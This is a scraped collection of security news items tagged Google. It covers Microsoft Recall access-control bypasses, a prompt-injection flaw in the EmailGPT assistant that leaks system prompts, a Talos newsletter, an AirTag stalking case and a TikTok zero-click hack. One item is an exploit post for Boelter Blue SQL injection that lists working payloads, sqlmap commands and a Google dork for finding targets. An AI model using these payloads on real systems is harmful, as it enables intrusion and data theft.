Google is urging third-party Android app developers to incorporate generative artificial intelligence (GenAI) features in a responsible manner.
The new guidance from the search and advertising giant is an effort to combat problematic content, including sexual content and hate speech, created through such tools.
To that end, apps that generate content using AI must ensure they don't create

The AI Debate: Google's Guidelines, Meta's GDPR Dispute, Microsoft's Recall Backlash

A new discovery that the AI-enabled feature’s historical data can be accessed even by hackers without administrator privileges only contributes to the growing sense that the feature is a “dumpster fire.”

Microsoft's CEO Satya Nadella has hailed the company's new Recall feature, which stores a history of your computer desktop and makes it available to AI for analysis, as “photographic memory” for your PC. Within the cybersecurity community, meanwhile, the notion of a tool that silently takes a screenshot of your desktop every five seconds has been hailed as a hacker's dream come true and the worst product idea in recent memory.

Now, security researchers have pointed out that even the one remaining security safeguard meant to protect that feature from exploitation can be trivially defeated.

Since Recall was first announced last month, the cybersecurity world has pointed out that if a hacker can install malicious software to gain a foothold on a target machine with the feature enabled, they can quickly gain access to the user's entire history stored by the function. The only barrier, it seemed, to that high-resolution view of a victim's entire life at the keyboard was that accessing Recall's data required administrator privileges on a user's machine. That meant malware without that higher-level privilege would trigger a permission pop-up, allowing users to prevent access, and that malware would also likely be blocked by default from accessing the data on most corporate machines.

Then on Wednesday, James Forshaw, a researcher with Google's Project Zero vulnerability research team, published an update to a blog post pointing out that he had found methods for accessing Recall data _without_ administrator privileges—essentially stripping away even that last fig leaf of protection. “No admin required ;-)” the post concluded.

“Damn,” Forshaw added on Mastodon. “I really thought the Recall database security would at least be, you know, secure.”

Forshaw's blog post described two different techniques to bypass the administrator privilege requirement, both of which exploit ways of defeating a basic security function in Windows known as access control lists that determine which elements on a computer require which privileges to read and alter. One of Forshaw's methods exploits an exception to those control lists, temporarily impersonating a program on Windows machines called AIXHost.exe that can access even restricted databases. Another is even simpler: Forshaw points out that because the Recall data stored on a machine is considered to belong to the user, a hacker with the same privileges as the user could simply rewrite the access control lists on a target machine to grant themselves access to the full database.

That second, simpler bypass technique “is just mindblowing, to be honest,” says Alex Hagenah, a cybersecurity strategist and ethical hacker. Hagenah recently built a proof-of-concept hacker tool called TotalRecall designed to show that someone who gained access to a victim's machine with Recall could immediately siphon out all the user's history recorded by the feature. Hagenah's tool, however, still required that hackers find another way to gain administrator privileges through a so-called “privilege escalation” technique before his tool would work.

With Forshaw's technique, “you don’t need any privilege escalation, no pop-up, nothing,” says Hagenah. “This would make sense to implement in the tool for a bad guy.”

In fact, just an hour after speaking to WIRED about Forshaw's finding, Hagenah added the simpler of Forshaw's two techniques to his TotalRecall tool, then confirmed that the trick worked by accessing all the Recall history data stored on another user's machine for which he didn't have administrator access. “So simple and genius,” he wrote in a text to WIRED after testing the technique.

That confirmation removes one of the last arguments Recall's defenders have had against criticisms that the feature acts as, essentially, a piece of pre-installed spyware on a user's machine, ready to be exploited by any hacker who can gain a foothold on the device. “It makes your security very fragile, in the sense that anyone who penetrates your computer for even a second can get your whole history,” says Dave Aitel, the founder of the cybersecurity firm Immunity and a former NSA hacker. “Which is not something people want.”

For now, security researchers have been testing Recall in preview versions of the tool ahead of its expected launch later this month. Microsoft said it plans to integrate Recall on compatible Copilot+ PCs with the feature turned on by default. WIRED reached out to the company for comment on Forshaw's findings about Recall's security issues, but the company has yet to respond.

The revelation that hackers can exploit Recall without even using a separate privilege escalation technique only contributes further to the sense that the feature was rushed to market without a proper review from the company's cybersecurity team—despite the company's CEO Nadella proclaiming just last month that Microsoft would make security its first priority in every decision going forward. “You cannot convince me that Microsoft's security teams looked at this and said ‘that looks secure,’” says Jake Williams, a former NSA hacker and now the VP of R&D at the cybersecurity consultancy Hunter Strategy, where he says he's been asked by some of the firm's clients to test Recall's security before they add Microsoft devices that use it to their networks.

“As it stands now, it’s a security dumpster fire,” Williams says. “This is one of the scariest things I’ve ever seen from an enterprise security standpoint.”

Microsoft’s Recall Feature Is Even More Hackable Than You Thought

Synopsys warns of a new prompt injection hack involving a security vulnerability in EmailGPT, a popular AI email…

Synopsys warns of a new prompt injection hack involving a security vulnerability in EmailGPT, a popular AI email assistant. Learn how a security flaw in EmailGPT could allow hackers to steal your data or cause financial losses. Discover what you can do to protect yourself and why security is crucial in AI-powered tools.

A security vulnerability discovered by Synopsys’ Cybersecurity Research Center (CyRC) has exposed a potential pitfall for users of EmailGPT, a popular AI-powered email writing assistant and Google Chrome extension.

This vulnerability, tracked as CVE-2024-5184 and dubbed prompt injection, could allow malicious threat actors to manipulate the service and potentially compromise sensitive information.

****What is EmailGPT?****

EmailGPT leverages OpenAI’s GPT models to assist users in crafting emails within Gmail. Users can receive AI-generated suggestions for composing emails more efficiently by providing prompts and context. However, the recent discovery highlights a potential security flaw in this functionality.

****The Prompt Injection Threat****

EmailGPT uses an API service that allows a malicious user to inject a direct prompt and take over the service logic. Attackers can exploit this by forcing the AI service to leak standard system prompts or execute unwanted prompts.

When submitting a malicious prompt, the system provides the requested data, making it vulnerable to exploitation by anyone having access to the service. The vulnerability has a CVSS score of 6.5, indicating medium severity.

****Possible Dangers****

A malicious user could create a prompt that injects unintended functionality, potentially leading to data extraction, spam campaigns using compromised accounts, and generating misleading email content, contributing to disinformation campaigns. Apart from causing intellectual property leakage, this vulnerability can lead to denial-of-service, and financial loss when exploited. 

As per Synopsys’ blog post, researchers reached out to the developers of EmailGPT before publicizing the details, adhering to their responsible disclosure policy, but did not receive a response yet. Researchers recommend immediately removing EmailGPT from any installations as no workaround is currently available.

Users should stay informed about updates and patches to ensure continued secure use of the service. As AI technology continues to evolve, vigilance and robust security practices will be crucial to mitigate potential risks.

> _“The CyRC reached out to the developers but has not received a response within the 90-day timeline dictated by our responsible disclosure policy. The CyRC recommends removing the applications from networks immediately.”_
> 
> Synopsys

Patrick Harr, CEO at Pleasanton, Calif.- based SlashNext Email Security commented on the issue and emphasised the importance of strong governance and security measures for AI models to prevent vulnerabilities and exploits, stating that businesses should require proof of security from AI model suppliers before integrating them into their operations.

_“_This latest research by the Synopsys Cybersecurity Research Center further highlights the importance of strong governance on building, securing and red-teaming the AI models themselves. At its core, AI is code that can be exploited like any other code and the same processes need to be put in place to secure that code to prevent these unwanted prompt exploits,_“_ Patrik said. 

_“_Security and governance of the AI models are paramount as part of the culture and hygiene of companies building and proving the AI models either through applications or APIs. Customers particularly businesses need to demand proof of how the suppliers of these models are securing themselves including data access BEFORE they incorporate them into their business,_“_ he added.

****REALTED TOPICS** **

1.  New LLMjacking Attack Lets Hackers Hijack AI Models
2.  Flaws Exposed Hugging Face to AI Supply Chain Attacks
3.  AI Generated Fake Obituary Websites Target Grieving Users
4.  AI-Powered Scams, Human Trafficking Fuel Global Crime Surge
5.  ShadowRay Campaign Targets Ray AI Framework in Global Attack

New EmailGPT Flaw Puts User Data at Risk: Remove the Extension NOW

Boelter Blue System Management version 1.3 suffers from a remote SQL injection vulnerability.

    Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)Google Dork: inurl:"Powered by Boelter Blue"Date: 2024-06-04Exploit Author: CBKB (DeadlyData, R4d1x)Vendor Homepage: https://www.boelterblue.comSoftware Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_USVersion: 1.3Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12CVE: CVE-2024-36840Vulnerability Details:Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.PoC:web server operating system: Linux Debian 9 (stretch)web application technology: Apache 2.4.25back-end DBMS: MySQL >= 5.0.12[22:21:39] [INFO] fetching database namesavailable databases [5]:[*] Anchor5Digital1. news_details.php?id parameter:Type: Boolean-based blindPayload: id=10071 AND 4036=4036Type: Time-based blindPayload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION queryPayload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Example SQLMap Command: sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs2. services.php?section parameter:Type: Boolean-based blindPayload: section=(SELECT (CASE WHEN (1087=1087) THEN 5081 ELSE (SELECT 8711 UNION SELECT 5881) END))Type: Time-based blindPayload: section=5081 AND (SELECT 2101 FROM (SELECT(SLEEP(5)))nmcL)Example SQLMap Command: sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs3. location_details.php?id parameter:Type: Boolean-based blindPayload: id=836 AND 4036=4036Type: Time-based blindPayload: id=836 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION queryPayload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Example SQLMap Command: sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbsImpact:Unauthorized access to the database.Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials.Account takeovers and potential full control of the affected application.Discoverer(s)/Credits:CBKB (DeadlyData, R4d1x)References:https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840

Boelter Blue System Management 1.3 SQL Injection

AI’s integration into search engines could change the way many of us interact with the internet.

Thursday, June 6, 2024 14:00

As someone who used to think that his entire livelihood would come from writing, I’ve long wondered if any sort of computer or AI could replace my essential functions at work. For now, it seems there are enough holes in AI-generated language that my ability to write down a complete, accurate and cohesive sentence is not in danger. 

But a new wave of AI-generated search results is already turning another crucial part of my job and education on its head: search engine optimization. 

Google’s internal AI tool recently started placing its own answers to common queries in Google’s search engine at the top of results pages, above credible or original news sources. At first, this resulted in some hilarious mix-ups, including telling people they could mix glue into pizza sauce to keep cheese adhered to their crust, or that it’s safe to eat a small number of rocks every day as part of a balanced diet. 

While hilarious, I’m worried about the potential implications that these features may have in the future on misinformation and fake news on more important or easier-to-believe topics than topping your pizza with glue. 

There currently doesn’t seem to be a rhyme or reason to when these types of results do or don’t show up. Google recently announced several changes to its AI-generated search results that now aim to prevent misleading or downright false information on search queries that cover more “important” topics.  

“For topics like news and health, we already have strong guardrails in place. For example, we aim to not show AI Overviews for hard news topics, where freshness and factuality are important. In the case of health, we launched additional triggering refinements to enhance our quality protections,” the company said in a blog post.  

When testing this out firsthand, I got mixed results. For “hard” news topics, they aren’t displaying AI-generated results at all. For example, when I tried searching for topics like “Who should I vote for in the 2024 presidential election?” and “Does the flu vaccine really work?” 

But I did get one of the AI-generated answers when I searched for “When is a fever too high for a toddler?” The displayed answer told me to call a pediatrician if my child is older than three months and has a fever of 102.2 degrees Fahrenheit or higher. Parents’ experience in this realm will differ, but for whatever it’s worth, my daughter’s pediatrician specifically recommended to us not to seek emergency help until a fever has reached 104 degrees or lasts for more than 24 hours even with the use of fever-reducing medicine. 

Google’s AI also displayed information when I searched for “Talos cryptocurrency scams” to try and find one of our past blog posts. This summary was accurate, though it may have copy-pasted some text directly from press coverage of the Talos research in question — that’s a whole different issue that the journalist in me is concerned about. What was also interesting to me was that, when I entered the same exact search query the next day, the results page didn’t display this AI Overview. 

Bing, Microsoft’s direct Google search engine competitor, is also using its own form of AI-curated content to answer queries.  

My concern here is when or if these types of answers are generated for news topics that are already rife with misinformation — think elections, politics, public health and violent crime. Even a slight slip up from one of these language models, such as getting a certain number incorrect or displaying a link from a known fake news or satire site, could have major consequences for spreading disinformation. 

On last week’s episode of Talos Takes, Martin Lee and I discussed how the most convincing forms of disinformation and fake news are short, punchy headlines or social media posts. The average person is not as media literate as we’d like to think, and seeing a quick and easy summary of a topic after they type an answer into a search engine is likely going to be good enough for most users on the internet. It’s usually going above and beyond just to ask someone to click through to the second page of Google’s search results.  

AI’s integration into search engines could change the way many of us interact with the internet — I’ve been used to using Google’s search engine as my homepage since I was in middle school. At the risk of sounding hyperbolic, I don’t want to assume that this is going to be an issue, perhaps companies will sort all the issues out, or AI overviews won’t come for more serious news topics than general life questions. But so far, the results shouldn’t inspire much confidence. 

**The one big thing **

Cisco Talos recently discovered a new threat actor called “LilacSquid” targeting the IT and pharmacy sectors, looking to maintain persistent access on victim’s networks. This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.”    

**Why do I care? **

LilacSquid’s victimology includes a diverse set of victims consisting of information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources. Talos assesses with high confidence that this campaign has been active since at least 2021. Multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus — these are some of the most active threat actors currently on the threat landscape.  

**So now what? **

LilacSquid commonly gains access to targeted victims by exploiting vulnerable web applications, so as always, it’s important to patch any time there’s a vulnerability on your network. Talos has also released new Snort rules, ClamAV signatures and other Cisco Security detection that can detect LilacSquid’s activities and the malware they use.  

**Top security headlines of the week **

**Several hospitals in London are still experiencing service disruptions after a cyber attack targeting a third-party pathology services provider.** Some of the most high-profile healthcare facilities in Britain’s capital had to cancel or reschedule appointments or redirect patients to other hospitals. Lab services provider Synnovis confirmed the ransomware attack in a statement on Tuesday and said it was working with the U.K.’s National Health Service to minimize the effects on patients. This latest ransomware attack is illustrative of the larger cybersecurity issues facing the NHS, which manages a massive network of hospitals across the U.K. and has more than 1.7 million employees. In June 2023, the BlackCat ransomware group stole sensitive data from a few NHS hospitals and posted it on a data leak site. And just last month, a different group threatened to leak data from an NHS board overseeing a region of Scotland. The incident also forced other hospitals in the area to expand their capacities and operations to take on more patients, potentially stretching their resources thin. As of Wednesday afternoon, there was no timetable available for the resolution of these issues. (The Record by Recorded Future, Bloomberg) 

**International law enforcement agencies teamed up for what they are calling one of the largest botnet disruptions ever.** U.S. prosecutors announced last week that it dismantled a botnet called “911 S5,” arresting and charging its administrator as part of a global effort. The botnet reportedly infected more than 19 million residential IP addresses, using the compromised devices to mask cybercriminal activity for anyone who paid for access to the botnet. Adversaries had used 911 S5 for a range of malicious activities, including bomb threats, the distribution of child abuse imagery and the creation of fraudulent COVID-19 relief payments totaling more than $6 billion. The administrator, a People’s Republic of China native, is charged with creating and disseminating “malware to compromise and amass a network of millions of residential Windows computers worldwide,” according to a U.S. Department of Justice press release. The botnet was allegedly active between 2014 and July 2022. 911 built its network by offering a phony “free” VPN service to users, allowing them to browse the web while redirecting their IP address and protecting their privacy. However, the VPN service turned the target’s device into a traffic replay for the malicious 911 S5 customers. (U.S. Department of Justice, Krebs on Security) 

**In a separate law enforcement campaign called “Operation Endgame,” law enforcement agencies from several countries disrupted droppers belonging to several malware families.** Targets included IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot. The coordinated effort between multiple European countries and the U.S. FBI led to four arrests of alleged malware operators and the seizure of more than 100 servers and 2,000 attacker-controlled domains. Eight Russian nationals have also been added to the list of Europe's most wanted fugitives for their alleged roles in developing the botnets behind Smokeloader and TrickBot, two of the most infamous malware families. Law enforcement agencies are also zeroing in on the person they believe to be behind the Emotet botnet, nicknamed “Odd.” "We have been investigating you and your criminal undertakings for a long time and we will not stop here," Operation Endgame warned in a video to threat actors. The investigation also found that the botnet operators had generated more than 69 million Euros by renting out their infrastructure to other threat actors so they could deploy ransomware. (Dark Reading, Europol) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #185: How much has AI helped bad actors who spread disinformation? 
*   DarkGate switches up its tactics with new payload, email templates 
*   New banking trojan “CarnavalHeist” targets Brazil with overlay attacks 
*   New Nork-ish cyberespionage outfit uncovered after three years 
*   LilacSquid APT Employs Open Source Tools, QuasarRAT 
*   NHS cyber attack causes cancellations as London hospitals hit by ‘major IT incident’ 

**Upcoming events where you can find Talos **

**_AREA41_** **_(June 6 – 7)_** 

_Zurich, Switzerland_ 

> _Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches._ 

**_Cisco Connect U.K._** **_(June 25)_**

_London, England_

> _In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe._

**_BlackHat USA_** **_(Aug. 3 – 8)_** 

_Las Vegas, Nevada_ 

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202   
**MD5:** e4acf0e303e9f1371f029e013f902262   
**Typical Filename:** FileZilla\_3.67.0\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.Application.27hg.1201 

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0   
**MD5:** b4440eea7367c3fb04a89225df4022a6   
**Typical Filename:** Pdfixers.exe   
**Claimed Product:** Pdfixers   
**Detection Name:** W32.Superfluss:PUPgenPUP.27gq.1201 

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0    
**MD5:** 8c69830a50fb85d8a794fa46643493b2    
**Typical Filename:** AAct.exe    
**Claimed Product:** N/A     
**Detection Name:** PUA.Win.Dropper.Generic::1201

The sliding doors of misinformation that come with AI-generated search results

A husband, now indicted, allegedly used seven Apple AirTags to stalk his ex-wife over a period of several weeks. His trial begins this month.

Following their divorce, a husband carried out a campaign of stalking and abuse against his ex-wife—referred to only as “S.K.”—by allegedly hiding seven separate Apple AirTags on or near her car, according to documents filed by US prosecutors for the Eastern District of Pennsylvania.

The documents, unearthed by 404 Media in collaboration with Court Watch, reveal how everyday consumer tools, like Bluetooth trackers, are sometimes leveraged for abuse against spouses and romantic partners.

 “The Defendant continued to adapt and use increasingly sophisticated efforts to hide the AirTags he placed on S.K.’s car,” US attorneys said. “It is clear from the timing of the placement of the AirTags and corroborating cell-site data, that he was monitoring S.K.’s movements.”

On May 8, the US government filed an indictment against the defendant, Ibodullo Muhiddinov Numanovich, with one alleged count of stalking against his ex-wife, S.K.

The stalking at the center of the government’s indictment allegedly began around March 27, when the FBI first learned about S.K. finding and removing an AirTag from her car. Less than a month later, on April 18, the FBI found a second AirTag that “was taped underneath the front bumper of S.K.’s vehicle with white duct tape.”

The very next day, the FBI found a third AirTag. This time, it was “wrapped in a blue medical mask and secured under the vehicle near the rear passenger side wheel well.”

This pattern of finding an AirTag, removing it, and then finding another was punctuated by physical and verbal intimidation, the government wrote. After a fourth AirTag was removed, the government said that Numanovich called S.K., followed her to a car wash, and “banged on her windows, and demanded to know why S.K. was not answering his calls.” Less than one week later, during a period of just 10 minutes, the government said that Numanovich left five threatening voice mails on S.K.’s phone, calling her “disgusting” and “worse than an animal.”

During the investigation, the FBI retrieved seven AirTags in total. Here is where those AirTags were found:

1.  Found by S.K. with no detail on specific location
2.  Duct-taped underneath the front bumper of S.K.’s car
3.  Underneath S.K.’s car, near the passenger-side wheel well, wrapped in a blue medical mask
4.  Within the frame of SK’s driver-side mirror, wedged between the mirror itself and the casing around it
5.  “An opening within the vehicle’s frame” which, documents say, was previously sealed by a rubber plug that was removed
6.  Underneath the license plate on S.K.’s car
7.  Undisclosed

For two of the retrieved AirTags, the FBI deactivated the trackers and then, away from S.K., placed the AirTags at separate locations. At an undisclosed location in Philadelphia where the FBI placed one AirTag, FBI agents later saw Numanovich “exit his vehicle with his phone in his hand, and begin searching for the AirTag.” At a convenience store where the FBI placed a second AirTag, agents said they again saw Numanovich.

The FBI also received information about attempted pairings and successful unpairings with Numanovich’s Apple account for three of the Apple AirTags.

In addition to the alleged pattern of stalking, the government also accused Numanovich of abusing SK both physically and emotionally, threatening her in person and over the phone, and recording sexually explicit videos of her to use as extortion. After a search warrant was authorized on May 13, agents found “approximately 140 sexually explicit photographs and videos of S.K.” stored on Numanovich’s phone, along with records for “numerous” financial accounts that transferred more than $4 million between 2022 and 2023.

In a follow-on request from the government to detain Numanovich before his trial begins, prosecutors also revealed that S.K. may have been brought into the US through a “Russian-based human smuggling network”—a network of which Numanovich might be a member.

According to 404 Media, a jury trial for Numanovich is scheduled to start on June 8.

**Improving AirTag safety**

Just last month, Apple and Google announced an industry specification for Bluetooth tracking devices such as AirTags to help alert users to unwanted tracking. The specification will make it possible to alert users across both iOS and Android if a device is unknowingly being used to track them. We applaud this development.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Husband stalked ex-wife with seven AirTags, indictment says 

Google has announced plans to store Maps Timeline data locally on users' devices instead of their Google account effective December 1, 2024.
The changes were originally announced by the tech giant in December 2023, alongside changes to the auto-delete control when enabling Location History by setting it to three months by default, down from the previous limit of 18 months.
Google Maps Timeline,

Google Maps Timeline Data to be Stored Locally on Your Device for Privacy

Eliot Higgins and his 28,000 forensic foot soldiers at Bellingcat have kept a miraculous nose for truth—and a sharp sense of its limits—in Gaza, Ukraine, and everywhere else atrocities hide online.

How to Lead an Army of Digital Sleuths in the Age of AI

TikTok accounts are being hacked! Celebrities and brands targeted in zero-click attack. Learn more about this major security…

TikTok accounts are being hacked! Celebrities and brands targeted in zero-click attack. Learn more about this major security breach in which accounts have been compromised.

Social media, online shopping and video giant TikTok has experienced a cyberattack in which attackers managed to compromise celebrity and brand accounts, including hotel heiress Paris Hilton, Sony, and CNN. 

While specific details about the nature of the attack are scarce at the moment, VXUnderground explained in its post on X (formerly Twitter) that an unknown threat actor discovered an exploit in TikTok that allows users to hijack accounts. The payload is delivered through TikTok direct messages and executed when read, without requiring external files or user response. 

The number of affected accounts is currently unclear but according to the latest update from TikTok, only two accounts have been compromised, one being CNN’s. 

The attack was first reported by Semafor and Forbes, according to which TikTok was targeted in a zero-click account takeover campaign that allows malware to compromise brand and celebrity accounts without direct interaction. Both the outlets confirmed that CNN temporarily removed its account after being hacked.  

A search for CNN returns no results for the US-based English language account

According to TikTok’s spokesperson, Alex Haurek, the number of compromised accounts is “very small,” but refused to explain how TikTok is protecting other exposed accounts.

“We are dedicated to maintaining the integrity of the platform and will continue to monitor for any further inauthentic activity,” Haurek said, specifically referring to CNN’s account compromise. TikTok is working with the news outlet to restore account access and implement enhanced security measures to safeguard their TikTok account.

TikTok’s privacy and security team spokesperson, Jason Grosse, stated that the company is still investigating the attack and cannot comment on its scale or sophistication, but mentioned that the threat is a “potential exploit.”

For your information, Hilton’s staff and sources at TikTok have confirmed that her account was targeted but not compromised.

Hanna Basha, Partner at Payne Hicks Beach, one of the oldest and known law firms in the United Kingdom, commented on the incident highlighting the threat luring behind data sharing on social media.

_“_TikTok is the latest of many companies to be subject to a cyberattack highlighting that it is now almost impossible to avoid these sorts of attacks and therefore incredibly important that individuals consider carefully what they are sharing on social media platforms,_“_ warned Hanna.

_“_Individuals sharing private messages have legal rights in privacy, confidence and data to keep these messages private and prevent them from being published. However, the practical advice must be to try to limit what you do share, even in direct messages, and before sending consider whether it could be damaging or embarrassing if published,” Hanna emphasised.

ByteDance-owned TikTok, with over one billion users globally, has reportedly taken measures to prevent future attacks and is working with affected account owners to restore access if needed.

TikTok has long been criticized for its security practices, particularly when in January 2021 Check Point Research identified a flaw that could have allowed attackers to build a database of TikTok users and in September 2022, Microsoft discovered a one-click exploit affecting the Android app, allowing attackers to take over accounts. It is about time the company strengthens its cybersecurity mechanisms to prevent similar incidents.

1.  TikTok vulnerability allowed hackers to send SMS with malware
2.  TikTok Invisible Body Challenge Trend Abused to Drop Malware
3.  TikTokers promoted adware, earned half a million dollars in profit
4.  TikTok collected MAC addresses for Android against Google’s ToS
5.  New smishing scam spreads fake TikTok App loaded with malware

Few But High-Profile TikTok Accounts Hacked Via Zero-Click Attack in DM

A WIRED investigation, based on more than 22 million flight coordinates, reveals the complicated truth about the first full-blown police drone program in the US—and why your city could be next.

Tag

#google